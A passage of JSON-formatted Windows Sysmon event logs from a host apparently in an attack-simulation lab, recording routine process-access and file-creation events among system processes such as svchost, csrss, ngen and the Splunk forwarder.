C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7569,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.773\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-221C-5F25-0000-001017FB0A00}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.773","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-221C-5F25-0000-001017FB0A00}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7570,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.913\r\nSourceProcessGUID: {41C8662E-2258-5F25-0000-0010CDE10D00}\r\nSourceProcessId: 2232\r\nSourceThreadId: 4948\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.913","SourceProcessGUID":"{41C8662E-2258-5F25-0000-0010CDE10D00}","SourceProcessId":"2232","SourceThreadId":"4948","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7571,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:44.960\r\nProcessGuid: {41C8662E-2258-5F25-0000-001067DD0D00}\r\nProcessId: 3408\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d50-0\\PresentationFramework.Luna.dll\r\nCreationUtcTime: 2020-08-01 08:05:44.960","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:44.960","ProcessGuid":"{41C8662E-2258-5F25-0000-001067DD0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d50-0\\PresentationFramework.Luna.dll","CreationUtcTime":"2020-08-01 08:05:44.960","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7572,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.007\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-00106EE40D00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-00106EE40D00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7573,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-00106EE40D00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-00106EE40D00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7574,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.007\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-00106EE40D00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.007","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-00106EE40D00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7575,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.054\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-001015E80D00}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.054","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-001015E80D00}","TargetProcessId":"3824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7576,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.054\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-001015E80D00}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.054","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-001015E80D00}","TargetProcessId":"3824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7577,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-001015E80D00}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 